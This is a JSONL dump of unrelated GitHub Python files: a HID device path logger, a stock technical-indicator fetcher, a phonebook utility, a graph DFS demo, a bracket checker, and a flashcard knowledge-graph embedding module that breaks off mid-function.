+{"seq_id":"73619172107","text":"import hid\n\n# Update with the vendor_id and product_id for your device\nl = hid.enumerate(65261,24688)\nd = next(item for item in l if item['interface_number'] == 1)\np = d['path']\n# Update this directory\nf = open('/Users/dustin/swiftbar-key/path.log', 'wb')\nf.write(p)\nf.close()","repo_name":"dustincredible/swiftbar-key","sub_path":"get_path.py","file_name":"get_path.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"12996037792","text":"import pandas as pd\nimport numpy as np\nfrom decimal import Decimal\nimport datetime, requests, json, math, sys, os\n\n\ndef get_dates_five_years(testing=False):\n \"\"\"Returns a 2-item tuple of dates in yyyy-mm-dd format 5 years in between today.\n\n Args:\n testing (bool, optional): If set to true, always returns ('2017-02-13', '2022-02-11'). Defaults to False.\n\n Returns:\n tuple: (from_date, to_date)\n \"\"\"\n\n if testing:\n return ('2017-02-13', '2022-02-11')\n\n # generate datetime objects\n date_today = datetime.datetime.now()\n date_five_years_ago = date_today - datetime.timedelta(days=round(365.25 * 5))\n\n return (date_five_years_ago.strftime('%Y-%m-%d'), date_today.strftime('%Y-%m-%d'))\n\n\ndef get_trading_dates(stock_ticker, date_range, token):\n exchange = 'PSE'\n url = f\"https://eodhistoricaldata.com/api/eod/{stock_ticker}.{exchange}?api_token={token}&order=a&fmt=json&from={date_range[0]}&to={date_range[1]}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n return data['date']\n\n\ndef get_technical_indicators(data):\n \"\"\"Computes for log stock returns and technical indicators unavailable to EOD (e.g., A/D, CMF, WR).\n Args:\n data (pd.Dataframe): Dataframe containing dates and OHLCV stock data from EOD.\n\n Returns:\n pd.Dataframe: Dataframe containing dates, log stock returns and technical indicators.\n \"\"\" \n\n # get closing prices and volume from data\n try:\n close = data['adjusted_close']\n except KeyError:\n close = data['close']\n\n data_len = len(close)\n\n # compute log stock returns\n stock_returns = [np.NaN]\n for i in range(1, data_len):\n stock_return = math.log(Decimal(close[i]) / Decimal(close[i - 1]))\n stock_returns.append(stock_return)\n\n # compute A/D indicator values\n ad = []\n for i in range(data_len):\n ad_close = Decimal(close[i])\n ad_low = Decimal(data['low'][i])\n ad_high = Decimal(data['high'][i])\n\n if ad_low == ad_high:\n raise Exception(f'Error getting A/D indicator. A period has the same high and low price (zero division error).')\n \n mfm = ((ad_close - ad_low) - (ad_high - ad_close)) / (ad_high - ad_low)\n curr_ad = mfm * data['volume'][i]\n ad.append(curr_ad)\n\n # compute William's %R indicator values\n wr_period = 14\n wr = [np.NaN] * (wr_period - 1)\n\n for i in range(wr_period, data_len + 1):\n wr_high = (data['high'][i - wr_period : i]).max()\n wr_low = (data['low'][i - wr_period : i]).min()\n wr_close = close[i - 1]\n\n if wr_low == wr_high:\n raise Exception(f\"Error getting William's %R indicator. A period has the same highest and lowest price (zero division error).\")\n \n curr_wr = Decimal(wr_high - wr_close) / Decimal(wr_high - wr_low)\n wr.append(curr_wr)\n\n # compute Chaulkin Money Flow indicator\n cmf_period = 20\n\n mfv = []\n cmf = [np.NaN] * (cmf_period - 1)\n\n for i in range(data_len):\n cmf_close = Decimal(close[i])\n cmf_low = Decimal(data['low'][i])\n cmf_high = Decimal(data['high'][i])\n cmf_volume = data['volume'][i]\n\n if cmf_low == cmf_high:\n raise Exception(f'Error getting CMF indicator. A period has the same high and low price (zero division error).')\n\n curr_mfv = (((cmf_close - cmf_low) - (cmf_high - cmf_close)) / (cmf_high - cmf_low)) * cmf_volume\n mfv.append(curr_mfv)\n\n for i in range(cmf_period, data_len + 1):\n curr_cmf = sum(mfv[i - cmf_period : i]) / sum(data['volume'][i - cmf_period : i])\n cmf.append(curr_cmf)\n\n\n # convert to dataframe\n technical_indicators = pd.DataFrame({\n 'date': data['date'],\n 'log_return': stock_returns,\n 'ad' : ad,\n 'wr' : wr,\n 'cmf' : cmf\n })\n\n return technical_indicators\n\n\ndef get_technical_indicator_from_EOD(indicator, period, token, stock_ticker, exchange, date_range):\n \"\"\"Gets daily technical indicator data from EOD API.\n\n Args:\n indicator (str): The indicator for use in EOD API calls. (e.g., rsi)\n period (str): The period used in computing the technical indicator.\n token (str): The EOD API key or token.\n stock_ticker (str): The stock ticker being examined (e.g., BPI).\n exchange (str): The stock exchange where the stock is being traded (e.g., PSE)\n date_range (tuple): A tuple of strings indicating the start and end dates for the requested data.\n\n Raises:\n Exception: Raises exception whenever gathered indicator data is insufficient to cover the specified\n date range. This may be fixed by increasing the timedelta used in computing the adjusted_first_day variable\n within the function.\n\n Returns:\n pd.Dataframe: Dataframe containing dates and specified technical indicator data\n \"\"\"\n\n # compute an adjusted from or start date for the API\n first_trading_day_datetime = datetime.datetime.strptime(date_range[0],'%Y-%m-%d')\n adjusted_first_day = ((first_trading_day_datetime) - datetime.timedelta(days=100)).strftime('%Y-%m-%d')\n \n url = f\"https://eodhistoricaldata.com/api/technical/{stock_ticker}.{exchange}?order=a&fmt=json&from={adjusted_first_day}&to={date_range[1]}&function={indicator}&period={period}&api_token={token}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n # remove rows with dates earlier than wanted from date\n for index, row in data.iterrows():\n\n # date of current row entry\n curr_date = datetime.datetime.strptime(row['date'],'%Y-%m-%d')\n\n # remove unneeded earlier row entries\n if curr_date < first_trading_day_datetime:\n data.drop(index, inplace=True)\n\n else:\n break\n\n # reset indices after dropping rows\n data = data.reset_index(drop=True)\n\n\n # raise an exception if the data from EOD API is insufficient to cover the date range specified\n # this error may be fixed by increasing timedelta used in computing adjusted_first_day\n if data['date'][0] != date_range[0]:\n raise Exception(f'Error getting {indicator} indicator for {stock_ticker}.')\n\n return data\n\n\ndef get_technical_data(stock_ticker, date_range):\n \"\"\"Computes and gets technical dataset for a specific stock. To be used for model training.\n\n Args:\n stock_ticker ([type]): [description]\n date_range ([type]): [description]\n\n Raises:\n Exception: Raises exception whenever np.NaN is present in the processed technical dataset.\n This can occur if the EOD API data is missing data for a technical indicator on a specific day.\n\n Returns:\n pd.Dataframe: Dataframe representing the dates, log stock returns, and technical indicators.\n \"\"\"\n\n # get API key/token from txt file\n with open('keys/EOD_API_key.txt') as file:\n token = file.readline()\n\n # get first and last trading days in the specified date range\n trading_days = get_trading_dates(stock_ticker, date_range, token)\n first_trading_day = trading_days[0]\n last_trading_day = trading_days.iat[-1]\n\n # adjust and add days to first trading day to be able to compute indicators with periods\n first_trading_day_datetime = datetime.datetime.strptime(first_trading_day,'%Y-%m-%d')\n adjusted_first_day = (first_trading_day_datetime - datetime.timedelta(days=30)).strftime('%Y-%m-%d')\n\n exchange = 'PSE'\n url = f\"https://eodhistoricaldata.com/api/eod/{stock_ticker}.{exchange}?api_token={token}&order=a&fmt=json&from={adjusted_first_day}&to={last_trading_day}\"\n\n response = requests.get(url)\n data = response.json()\n\n # convert to pd.dataframe\n data = pd.json_normalize(data)\n\n # # minimize volume data\n # data[\"volume\"] = data[\"volume\"].apply(lambda x: x)\n\n # compute returns and technical indicators not available on EOD\n technical_indicators = get_technical_indicators(data)\n data = data.merge(technical_indicators, on='date')\n\n # remove rows with dates earlier than wanted from date\n for index, row in data.iterrows():\n curr_date = datetime.datetime.strptime(row['date'],'%Y-%m-%d')\n\n if curr_date < first_trading_day_datetime:\n data.drop(index, inplace=True)\n\n else:\n break\n\n # reset indices after dropping rows\n data = data.reset_index(drop=True)\n\n # get available technical indicators from API. format: (indicator, period)\n EOD_indicators = [('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14), ('slope', 14), ('stochastic', 14), ('macd', 26)]\n #[('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14), ('slope', 3), ('stochastic', 14), ('macd', 26)]\n #[('atr', 14), ('rsi', 14), ('cci', 20), ('adx', 14)]\n\n for indicator, period in EOD_indicators:\n indicator_data = get_technical_indicator_from_EOD(indicator, period, token, stock_ticker, exchange, (first_trading_day, last_trading_day))\n data = data.merge(indicator_data, on='date')\n\n # remove unneeded features/columns in dataframe\n data = data.drop(columns=['open', 'high', 'low', 'adjusted_close', 'volume', 'close'])\n\n if data.isnull().values.any():\n raise Exception(f'Null value found in technical dataset for {stock_ticker}')\n\n # linearly scale up/down indicators to avoid power transform errors\n # for indicator in data.columns:\n # if indicator != 'date':\n # scale_factor = round(math.log10(data[f'{indicator}'].abs().max()))\n # data[f'{indicator}'] = data[f'{indicator}'].apply(lambda x: float(Decimal(x) / Decimal(10 ** (scale_factor))))\n\n return data\n\n\ndef main():\n print(get_technical_data('BPI', get_dates_five_years(testing=True)))\n\n\nif __name__ == '__main__':\n main()","repo_name":"seansom/stock-direction-forecasting","sub_path":"old/get_technical_data.py","file_name":"get_technical_data.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"20395103459","text":"def create(path, initialContacts):\r\n try:\r\n file = open(path, 'r')\r\n except IOError:\r\n print('Создан новый справочник -> ' + path)\r\n file = open(path, 'w')\r\n file.writelines(\"%s\\n\" % contact for contact in initialContacts)\r\n finally:\r\n file.close()\r\n\r\ndef add_cont(file_name, newContact):\r\n data = open(file_name, 'a')\r\n data.write(newContact + \"\\n\")\r\n data.close()\r\n\r\ndef search(file_name, searchMask = \" \") :\r\n phoneBook = read_phoneBook(file_name)\r\n if searchMask != \" \":\r\n phoneBook = list(filter(lambda x: searchMask.lower() in x.lower(), phoneBook))\r\n return phoneBook\r\n\r\ndef delete_contact(file_name, contact):\r\n phoneBook = read_phoneBook(file_name)\r\n phoneBook.remove(contact)\r\n data = open(file_name, 'w')\r\n data.writelines(\"%s\\n\" % contact for contact in phoneBook)\r\n data.close\r\n\r\ndef read_phoneBook(file_name):\r\n data = open(file_name, 'r')\r\n phoneBook = list()\r\n for line in data:\r\n phoneBook.append(line[:-1])\r\n data.close()\r\n return sorted(phoneBook)","repo_name":"yury-poloshkov/Python-Homework","sub_path":"Homework08/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5887161256","text":"import networkx\nimport matplotlib.pyplot as plt\n\ndef input_edges_list():\n \"\"\"считывает список рёбер в форме:\n в первой строке N - число рёбер,\n затем следует N строк из двух слов и одного числа\n слова - названия вершин, концы ребра, а число - его вес\n \n return граф в форме словаря рёбер и соответствующих им весов\n \"\"\"\n N = int(input('Введите количество рёбер:'))\n G = {}\n for i in range(N):\n vertex1, vertex2, weight = input().split()\n weight = float(weight)\n G[(vertex1, vertex2)] = weight\n return G\n \ndef edges_list_to_adjacency_list(E):\n \"\"\"E - граф в форме словаря рёбер и соответствующих им весов\n return граф в форме словаря словарей смежности с весами\n \"\"\"\n G = {}\n for vertex1, vertex2 in E:\n weight = E[(vertex1, vertex2)]\n # добавляю ребро (vertex1, vertex2)\n if vertex1 not in G:\n G[vertex1] = {vertex2:weight}\n else: # значит такая вершина уже встречалась\n G[vertex1][vertex2] = weight\n # граф не направленный, поэтому добавляю ребро (vertex2, vertex1)\n if vertex2 not in G:\n G[vertex2] = {vertex1:weight}\n else: # значит такая вершина уже встречалась\n G[vertex2][vertex1] = weight\n return G\n\n\ndef dfs(G, start, called = set(), skelet = set()):\n called.add(start)\n for neighbour in G[start]:\n if neighbour not in called:\n dfs(G, neighbour, called, skelet)\n skelet.add((start, neighbour))\n\n\n\ns = \"\"\"A B 1\nB D 1\nB C 2\nC A 2\nC D 3\nD E 5\"\"\".split('\\n')\nE = {}\nfor line in s:\n a, b, weight = line.split()\n E[(a, b)] = int(weight)\n\nA = edges_list_to_adjacency_list(E)\n\ncalled = set()\nskelet = set()\ndfs(A, 'A', called, skelet)\nprint(called)\nprint(skelet)\n\nG = networkx.Graph(A)\nposition = networkx.spring_layout(G) # positions for all nodes\nnetworkx.draw(G, position)\nnetworkx.draw_networkx_labels(G, position)\nnetworkx.draw_networkx_edge_labels(G, position, edge_labels=E)\n# нарисуем остовное дерево:\nnetworkx.draw_networkx_edges(G, position, edgelist=skelet,\n width=5, alpha=0.5, edge_color='red')\n\nplt.show() # display\n","repo_name":"tkhirianov/kpk2016","sub_path":"graphs/input_graph.py","file_name":"input_graph.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"ru","doc_type":"code","stars":15,"dataset":"github-code","pt":"82"} +{"seq_id":"12560446177","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\nt = int(input())\r\nfor _ in range(t):\r\n st = input().rstrip()\r\n stack = []\r\n flag = True\r\n for el in st:\r\n if el == '(':\r\n stack.append(el)\r\n elif el == ')':\r\n if stack:\r\n stack.pop()\r\n continue\r\n flag = False\r\n break\r\n print('YES' if flag and not stack else 'NO')","repo_name":"Charmull/Algorithm_Python","sub_path":"백준/Silver/9012. 괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6707888412","text":"import os\nimport openai\nimport re\nimport json\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom typing import Any, Optional, Tuple, Dict, List, NamedTuple, Set\nimport scipy\nimport time\n\nfrom pprint import pprint as pprint\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rcParams['figure.dpi'] = 100\n\nfrom basic_utils import *\n\n# A few useful operations on embedding vectors (dictionaries of values\n\ntrimming_and_intersection_tolerance_amount = 1e-10\n\ndef emb_vec_inner_product(emb_vec1, emb_vec2):\n \"\"\"\n This is the key metric for the overlap of two embedding vectors \n \"\"\"\n # loop over all keys in one vector. \n # Get product of value in both vectors. If one is non-existent, then set it to 0. \n # This means we only have to loop over one vector \n prod_sum = 0.0\n if len(emb_vec1.keys()) < len(emb_vec2.keys()):\n for key, val in emb_vec1.items():\n val_other = emb_vec2.get(key, 0.0)\n if val * val_other > 0 :\n prod_sum += np.sqrt(val * val_other)\n else:\n for key, val in emb_vec2.items():\n val_other = emb_vec1.get(key, 0.0)\n if val * val_other > 0 :\n prod_sum += np.sqrt(val * val_other)\n return prod_sum\n\ndef trim_embedding_vector(emb_vec, \n embedding_vector_tolerance_fraction=trimming_and_intersection_tolerance_amount):\n \"\"\"\n Returns a shorter vector, which contains terms which sum to \n 1 - embedding_vector_tolerance_fraction. So most of them.\n \"\"\"\n \n emb_vec_vals = np.array(list(emb_vec.values()))\n emb_vec_vals.sort() # from low to high \n emb_vec_cumulative_threshold = np.sum(emb_vec_vals) * embedding_vector_tolerance_fraction\n \n emb_vec_vals_sorted_cumsum = np.cumsum(emb_vec_vals)\n num_below_threshold = len(np.where(emb_vec_vals_sorted_cumsum < emb_vec_cumulative_threshold)[0])\n if num_below_threshold > 0:\n threshold_val = emb_vec_vals[num_below_threshold - 1] \n # need to be strictly greater than this to be included in the trimmed vector\n else:\n threshold_val = 0.0\n\n emb_vec_trimmed = {k: v for k, v in emb_vec.items() if v > threshold_val}\n \n return emb_vec_trimmed\n\ndef emb_vec_weighted_union_of_nodes(node_title_list, knowledgeGraph):\n \"\"\"\n Gets an embedding vector which is a weighted sum of embedding vectors for the nodes.\n The intention is to find an embedding which characterizes the unique aspects of this set of nodes.\n That is it emphasizes the less common nodes more.\n\n Have to pass in knowledge graph as argument because union needs to know about \n meta data of nodes, in the knowledge graph\n\n There are two types of weighting used here. \n 1. First, the relative weighting of each node is adjusted since\n we don't want to use concepts associated with many other things. Want to use unique things.\n 2. Second, after summing the resulting embedding vector, from all the concepts in the card.\n When a node is highly referenced, we normalize its entry by the total amount of embedding pointing at it\n to get the fraction of all embedding pointing at this concept from unique aspects of the card \n This once again makes the card embedding sensitive mostly to unique values\n \"\"\"\n\n # Gather list of all keys from all the component nodes, to use in the resulting embedding\n node_title_set = set()\n for node_title in node_title_list:\n node = knowledgeGraph.nodes[node_title]\n node_title_set.update(set(node.embedding_vector.keys()))\n\n # Initialize emb vec to 0 for all keys \n union_emb_vec_prenorm = {neighbor_concept: 0.0 for neighbor_concept in node_title_set} \n\n # loop through embedding vectors of each of the nodes and add weighted value to existing value\n for node_index, node_title in enumerate(node_title_list):\n # note we use the list here, so if duplicates exist, they are intentionally counted more\n node = knowledgeGraph.nodes[node_title]\n effective_node_size_correction = 1.0 / (1.0 + node.sum_of_embeddings_to_node) \n for neighbor_concept, emb_value in node.embedding_vector.items():\n union_emb_vec_prenorm[neighbor_concept] += emb_value * effective_node_size_correction\n\n # Now loop through and divide each individual embedding item by the total number of references to it\n union_emb_vec = {k: val_prenorm / (1.0 + knowledgeGraph.nodes[k].sum_of_embeddings_to_node) \n for k, val_prenorm in union_emb_vec_prenorm.items()} \n\n # Finally, normalize the embedding vector to sum to 1\n # We do this because we want a similarity metric that isn't biased toward sums of many nodes.\n total_emb_vec = np.sum(list(union_emb_vec.values()))\n union_emb_vec = {k: v / total_emb_vec for k, v in union_emb_vec.items()} \n \n return union_emb_vec\n\n\ndef emb_vec_intersection_with_threshold(emb_vec_list, knowledgeGraph, intersection_threshold_amount=1e-10):\n \"\"\"\n Takes a set of embedding vectors, and gets the geometric average of their values for each key, \n It sets values to a lower threshold if they are not present in the vector. \n \n If a set of vectors have no intersection, it returns a uniform distribution over all keys\n Someday might want to update this to return the background distribution, rather than uniform.\n \n At the end, it normalizes the resulting vector to sum to 1. \n \n This is like averaging the logit values if we think of the embedding vector as output by a softmax dist.\n \n \"\"\"\n\n def get_emb_vec_lower_threshold_value(emb_vec, \n embedding_vector_tolerance_fraction=trimming_and_intersection_tolerance_amount):\n \"\"\"\n Returns the value in the vector where the cumulative sum of elements larger than this equals\n 1 - embedding_vector_tolerance_fraction. So most of them.\n \"\"\"\n\n emb_vec_vals = np.array(list(emb_vec.values()))\n emb_vec_vals.sort() # from low to high \n emb_vec_cumulative_threshold = np.sum(emb_vec_vals) * embedding_vector_tolerance_fraction\n\n emb_vec_vals_sorted_cumsum = np.cumsum(emb_vec_vals)\n num_below_threshold = len(np.where(emb_vec_vals_sorted_cumsum < emb_vec_cumulative_threshold)[0])\n if num_below_threshold > 0:\n threshold_val = emb_vec_vals[num_below_threshold - 1] \n else:\n threshold_val = 0.0\n \n # If value happens to be 0, then move up through vector until it's nonzero \n while threshold_val == 0.0:\n num_below_threshold += 1\n threshold_val = emb_vec_vals[num_below_threshold] \n\n return threshold_val\n\n def get_all_keys_over_emb_vec_list(emb_vec_list):\n all_keys = set(emb_vec_list[0].keys()) # just to get started \n for emb_vec in emb_vec_list:\n all_keys = all_keys.union(set(emb_vec.keys()))\n return all_keys\n \n def get_geometric_avg_over_emb_vec_list_specific_key(emb_vec_list, lower_threshold_list, k): \n # Going to take average of logs instead of 1/nth root of product, to encourage numerical stability\n # then exponentiate the average of logs\n \n num_emb_vecs = float(len(emb_vec_list))\n \n avg_of_logs = 0.0 \n for ind_of_vec, emb_vec in enumerate(emb_vec_list):\n # Use the lower threshold value of this vector as the default \n avg_of_logs += np.log(emb_vec.get(k, lower_threshold_list[ind_of_vec])) / num_emb_vecs\n return np.exp(avg_of_logs)\n \n # Get specific keys \n all_keys = get_all_keys_over_emb_vec_list(emb_vec_list)\n \n # Get lower threshold value for each embedding vector, to be used as default if key is not contained in vector\n lower_threshold_list = [get_emb_vec_lower_threshold_value(emb_vec,\n embedding_vector_tolerance_fraction=intersection_threshold_amount\n ) for emb_vec in emb_vec_list]\n \n # Take product of values\n emb_vec_intersection = {k: get_geometric_avg_over_emb_vec_list_specific_key(emb_vec_list, lower_threshold_list, \n k) for k in all_keys}\n \n # Now renormalize it to sum to 1, if it has nonzero values \n total_emb_vec = np.sum(list(emb_vec_intersection.values()))\n if total_emb_vec != 0.0:\n emb_vec_intersection = {k: v / total_emb_vec for k, v in emb_vec_intersection.items()}\n \n return emb_vec_intersection\n\n\ndef get_emb_vec_intersection_over_concepts(concept_list, knowledgeGraph):\n \n emb_vec_list = []\n for _ind, concept in enumerate(reversed(concept_list)):\n sig_vec = knowledgeGraph.nodes[concept].significance_vector \n emb_vec = knowledgeGraph.nodes[concept].embedding_vector \n emb_vec_list.append(emb_vec)\n \n emb_vec_int = emb_vec_intersection_with_threshold(emb_vec_list, knowledgeGraph)\n\n return emb_vec_int\n\ndef get_emb_vec_relative_abstraction_1to2(emb_vec1, emb_vec2, knowledgeGraph,\n heavy_trim_tolerance_fraction=1e-1):\n\n # Get very trimmed embedding vectors\n trimmed_emb_vec1 = trim_embedding_vector(emb_vec1, \n embedding_vector_tolerance_fraction=heavy_trim_tolerance_fraction)\n trimmed_emb_vec2 = trim_embedding_vector(emb_vec2, \n embedding_vector_tolerance_fraction=heavy_trim_tolerance_fraction)\n\n # loop through and get relative abstraction based on node-to-node abstraction\n # weight each cross pair by the product of embedding vector values (then normalized by total)\n rel_abs_with_weights_sum = 0.0 \n weights_sum = 0.0 \n for node1_title, node1_emb in trimmed_emb_vec1.items():\n for node2_title, node2_emb in trimmed_emb_vec2.items():\n rel_abs_dict_1to2 = knowledgeGraph.nodes[node1_title].neighbors_relative_abstraction\n rel_abs = 0.0\n if node2_title in rel_abs_dict_1to2.keys(): \n # This is the abstraction of 2 relative to 1 \n rel_abs = rel_abs_dict_1to2[node2_title]\n rel_abs_with_weights_sum += rel_abs * node1_emb * node2_emb\n weights_sum += node1_emb * node2_emb\n\n rel_abs = rel_abs_with_weights_sum / weights_sum\n\n return rel_abs \n\nclass CardConceptHierarchy:\n \"\"\"\n A datastructure for listing the major ideas corresponding to a card, both at higher and lower abstraction levels. \n \"\"\"\n \n def __init__(self, topic=\"\", topic_description=\"\"):\n # The first key is an integer, the abstraction level. 0 is base. 1 is more abstract, -1 is less abstract \n # second dictionary is the titles and descriptions of concepts \n self.abstraction_groups: Dict[int: Dict[str, str]] = {0 : {str(topic): str(topic_description)}}\n \n def set_concept(self, relative_abstraction, title, description):\n self.abstraction_groups.setdefault(relative_abstraction, {}) # creates entry if it does not exist\n self.abstraction_groups[relative_abstraction][str(title)] = str(description)\n \n def get_concepts_list(self): # Gets unique concepts, ordered by abstraction \n ordered_concepts_nonunique = [concept for abs_level, concept_dict in reversed(sorted(self.abstraction_groups.items()))\n for concept, desc in concept_dict.items() ]\n unique_inds = np.unique(ordered_concepts_nonunique, return_index=True)[1]\n return [ordered_concepts_nonunique[_unique_ind] for _unique_ind in sorted(unique_inds)]\n \n def get_abstractions_dict(self): # returns dictionary containing unique concepts, and abstracton level \n # If concept shows up at multiple abstraction levels, then average them together. \n unique_concepts = self.get_concepts_list()\n abs_level_samples = {concept: [] for concept in unique_concepts}\n for abs_level, concept_dict in reversed(sorted(self.abstraction_groups.items())):\n for concept, desc in concept_dict.items():\n abs_level_samples[concept].append(abs_level)\n abstractions_dict = {k: np.average(np.array(v)) for k, v in abs_level_samples.items()}\n return abstractions_dict\n \n def get_abstractions_dict_as_JSON_str(self):\n\n def list_to_doublequotes(_list):\n return '[\"' + '\", \"'.join(_list) + '\"]'\n\n _list = ['\"'+str(abs_level)+'\" : '+ list_to_doublequotes(list(concept_dict.keys())) \n for abs_level, concept_dict in sorted(self.abstraction_groups.items())]\n return \"{\" + ', '.join(_list) + \"}\"\n \nclass Card:\n \"\"\"\n Each card is a question answer pair. \n \"\"\"\n \n def __init__(self, cardID, topic, question, answer, key_ideas, cardConceptHierarchy):\n self.cardID = cardID # a unique integer given to each card \n self.topic: str = topic # effectively the label of the card\n self.question: str = question\n self.answer: str = answer\n self.key_ideas: str = key_ideas\n self.concepts: CardConceptHierarchy = cardConceptHierarchy \n # self.retention: float = 0.0 # a number from 0 to 1 giving the estimated correctness if asked now\n # self.history: List[[float, float]] = [] # list of past times, and accuracy at that time, of testing \n \n self.embedding_vector: Dict[str: float] = {} \n self.embedding_vector_trimmed: Dict[str: float] = {} # trimmed to not be as long of a dictionary if values are tiny\n \n def get_abstraction_from_1_to_2(self, concept1, concept2):\n abstractions_dict = self.concepts.get_abstractions_dict()\n return float(abstractions_dict[concept2] - abstractions_dict[concept1])\n \n def display(self, verbose=False):\n if not verbose:\n l1 = \"Topic: \" + self.topic\n l2 = \"Question: \" + self.question + ''\n l3 = \"Answer: \" + self.answer + ''\n print(\"\\n\".join([l1,l2,l3]) + \"\\n\")\n if verbose:\n l1 = \"Topic: \" + self.topic\n l2 = \"Question: \" + self.question + ''\n l3 = \"Answer: \" + self.answer + ''\n l4 = \"Key ideas:\\n\" + self.key_ideas\n \n print(\"\\n\".join([l1, l2, l3, l4]) + \"\\n\")\n \n def update_embedding_vector(self, knowledgeGraph):\n \"\"\"\n Embedding vector for card is a weighted sum of embedding vectors for the concepts in the card \n \n Have to pass in knowledge graph as argument because card needs to know about nodes, in the knowledge graph\n \"\"\"\n \n # Card concept list\n card_concepts_list = self.concepts.get_concepts_list()\n\n card_emb_vec = emb_vec_weighted_union_of_nodes(card_concepts_list, knowledgeGraph)\n \n self.embedding_vector = card_emb_vec # update stored value, then return it \n self.embedding_vector_trimmed = trim_embedding_vector(card_emb_vec)\n \n return card_emb_vec\n\n \nclass Node:\n \"\"\"\n Each node is a concept. \n \n Main attributes are:\n title : title of node. This is the ID, and the concept of the node. Used for searching\n cards : list of the cardID of cards that touch this node \n neighbors : a dictionary of neighboring nodes, with the list of cardIDs of cards connecting them \n neighbors_relative_abstraction : a dictionary of neighboring nodes, with the list of the \n relative abstraction from node to neighbor (higher means neighbor is more abstract). \n neighbors_connection_strength : a dictionary of neighboring nodes, with the connection strength from this\n node to that node, from the perspective of this node (number of cards connecting to that node, out of total cards)\n \"\"\"\n \n def __init__(self, title: str):\n self.title = title\n self.cards: Set[int] = set() # contains references to card IDs that touch this node \n self.neighbors: Set[str] = set()\n self.neighbors_card_connections: Dict[str: Set[int]] = {} # contains references to neighbor nodes, and the set of IDs of cards that connect them \n self.neighbors_connection_count: Dict[str: int] = {} \n self.neighbors_connection_strength: Dict[str: float] = {} \n self.neighbors_reverse_connection_strength: Dict[str: float] = {} # from the neighbor's perspective\n \n self.neighbors_relative_abstraction: Dict[str: float] = {} \n self.significance_vector: Dict[str: float] = {} # vector of probabilities from 0 to 1 that two concepts are associated\n self.sum_of_significances_to_node: float = 0.0 \n self.sum_of_significances_from_node: float = 0.0 \n \n self.raw_embedding_vector: Dict[str: float] = {} # vector of association strengths from significance and connection\n self.sum_of_raw_embeddings_to_node: float = 0.0 \n \n self.embedding_vector: Dict[str: float] = {} # vector of network-wise association strengths \n self.embedding_vector_trimmed: Dict[str: float] = {} # trimmed to not be as long of a dictionary if values are tiny\n self.sum_of_embeddings_to_node: float = 0.0 # sum of all other node embedding vectors values of this node\n\n def display_raw_metrics(self, num_connections_required_for_display=1):\n strength_bar_size_display = 20 # width in number of characters \n rel_abs_bar_size_display = 20\n display_title = (\"-------------------------------------------------------------------------\\n\"+\n \"Relative Abstracton Connection Strength Rev. Conn. Strength Concept\\n\"+\n \"-------------------------------------------------------------------------\")\n sorted_relative_abstraction = dict(reversed(sorted(self.neighbors_relative_abstraction.items(), key=lambda item: item[1])))\n rel_abs_scale = np.max(np.abs(np.array(list(sorted_relative_abstraction.values())))) + 1e-13 # to prevent 0 scale\n\n print(\"Node:\", self.title)\n print(\" {} cards\".format(len(self.cards)))\n print(\" {} card threshold for display\".format(num_connections_required_for_display))\n print(display_title)\n for neighbor_node_title, rel_abs in sorted_relative_abstraction.items():\n connection_strength = self.neighbors_connection_strength[neighbor_node_title]\n reverse_connection_strength = self.neighbors_reverse_connection_strength[neighbor_node_title]\n connection_count = self.neighbors_connection_count[neighbor_node_title]\n rel_abs_display_scale = rel_abs/rel_abs_scale\n\n if connection_strength >= min(self.neighbors_connection_strength.values())*num_connections_required_for_display:\n strength_bar = get_visual_display_bar_positive(connection_strength, strength_bar_size_display) \n reverse_strength_bar = get_visual_display_bar_positive(reverse_connection_strength, strength_bar_size_display) \n rel_abs_bar = get_visual_display_bar_symmetric(rel_abs_display_scale, rel_abs_bar_size_display)\n \n print(rel_abs_bar, strength_bar, reverse_strength_bar, neighbor_node_title, ' ', connection_count)\n \n def get_neighbor_titles_with_similar_abstraction(self, abstraction_window_plus_minus=0.5):\n n_node_title_list = [n_node_title for n_node_title in self.neighbors\n if np.abs(self.neighbors_relative_abstraction[n_node_title]) < abstraction_window_plus_minus]\n return n_node_title_list\n\n def get_sorted_neighbor_titles_by_abstraction(self):\n sorted_neighbor_titles = [str(k) for [k, v] in list(sorted(self.neighbors_relative_abstraction.items(), \n key=lambda item: item[1]))]\n return np.array(sorted_neighbor_titles)\n\n def dict_to_array(self, _dict):\n sorted_neighbor_titles = self.get_sorted_neighbor_titles_by_abstraction()\n return np.array([_dict[title] for title in sorted_neighbor_titles])\n \n def _get_predicted_connection_strength(self, abstraction_window_plus_minus_for_avg=1.501):\n \"\"\"\n This defines a window around each unique abstraction value, and calculates the average connection strength\n and number of samples in that window\n\n Returns two dictionaries for all datapoints (neighbors) contiaining the value, and sample count\n \"\"\"\n\n def get_avg_connection_strength_in_abstraction_window(node, _low, _high):\n con_samples = [node.neighbors_connection_strength[_title] for _title in node.neighbors\n if (node.neighbors_relative_abstraction[_title] <= _high and \n node.neighbors_relative_abstraction[_title] >= _low)\n ]\n num_con_samples = len(con_samples)\n avg_con_val = np.average(np.array(con_samples))\n return avg_con_val, num_con_samples\n\n def get_avg_connection_strength_near_abstraction_value(node, abs_val):\n abs_window = [abs_val - abstraction_window_plus_minus_for_avg, abs_val + abstraction_window_plus_minus_for_avg]\n avg_connection_val, num_samples = get_avg_connection_strength_in_abstraction_window(node, abs_window[0], abs_window[1])\n return [avg_connection_val, num_samples]\n \n def get_avg_connection_strength_vs_unique_abstractions(node, 